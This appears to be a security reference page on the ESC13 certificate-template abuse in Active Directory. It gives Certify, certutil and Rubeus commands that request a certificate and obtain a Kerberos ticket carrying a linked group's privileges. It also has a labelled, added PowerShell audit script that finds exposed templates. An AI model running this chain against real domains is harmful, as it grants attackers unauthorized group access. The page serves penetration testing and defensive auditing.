ESC13
If a principal (user or computer) has enrollment rights on a certificate template that is configured with an issuance policy, and that issuance policy has an OID group link, the principal can enroll for a certificate that grants access to the environment as a member of the group specified in the OID group link.
Windows
Request a certificate from the certificate template <template_name>
.\Certify.exe request /ca:<ca> /template:<template_name>
Save and convert the certificate
certutil -MergePFX .\esc13.pem .\esc13.pfx
Confirm the Client Authentication EKU and the ESC13OID issuance policy
certutil -Dump -v .\esc13.pfx
Authenticate (using the certificate)
.\Rubeus.exe asktgt /user:<user> /certificate:C:\esc13.pfx /nowrap
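Audit (finding exposed templates)
The condition described at the top of this page can be checked from the defender's side by correlating issuance policy OID objects that carry an OID group link with the templates that reference them. The script below is an added example, not code from the original page or the referenced post; it assumes the RSAT ActiveDirectory module and read access to the Configuration partition.

```powershell
# Added audit example (not from the original page).
# Assumes: RSAT ActiveDirectory module, read access to the Configuration partition.
Import-Module ActiveDirectory

$pkiBase = "CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)"

# Extended-right GUIDs: Certificate-Enrollment, Certificate-AutoEnrollment, all extended rights
$enrollGuids = '0e10c968-78fb-11d2-90d4-00c04f79dc55',
               'a05b8cc2-17bc-4802-a710-e7c15ab866a2',
               '00000000-0000-0000-0000-000000000000'
$extRight = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight

# Issuance policy OID objects that carry an OID group link, keyed by OID value
$linked = @{}
Get-ADObject -SearchBase "CN=OID,$pkiBase" -SearchScope OneLevel `
    -LDAPFilter '(&(objectClass=msPKI-Enterprise-Oid)(msDS-OIDToGroupLink=*))' `
    -Properties 'msPKI-Cert-Template-OID', 'msDS-OIDToGroupLink', 'displayName' |
    ForEach-Object { $linked[[string]$_.'msPKI-Cert-Template-OID'] = $_ }

# Templates whose issuance policies reference one of those OIDs
Get-ADObject -SearchBase "CN=Certificate Templates,$pkiBase" -SearchScope OneLevel `
    -LDAPFilter '(&(objectClass=pKICertificateTemplate)(msPKI-Certificate-Policy=*))' `
    -Properties 'msPKI-Certificate-Policy', 'pKIExtendedKeyUsage', 'nTSecurityDescriptor' |
    ForEach-Object {
        $template = $_
        # Principals with an Allow ACE granting enrollment on this template
        $enrollers = $template.nTSecurityDescriptor.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            ($_.ActiveDirectoryRights -band $extRight) -and
            ($enrollGuids -contains $_.ObjectType.ToString())
        } | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique

        foreach ($oid in $template.'msPKI-Certificate-Policy') {
            $key = [string]$oid
            if (-not $linked.ContainsKey($key)) { continue }
            [pscustomobject]@{
                Template       = $template.Name
                IssuancePolicy = $linked[$key].displayName
                PolicyOid      = $key
                LinkedGroup    = $linked[$key].'msDS-OIDToGroupLink'
                EKUs           = $template.pKIExtendedKeyUsage -join ','
                Enrollers      = $enrollers -join '; '
            }
        }
    }
```

Each row is a template where the listed enrollers effectively hold membership of LinkedGroup; compare the two and remove either the enrollment right or the OID group link where they should not match. The script does not check whether the template is published on a CA, so confirm that separately.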
References
https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53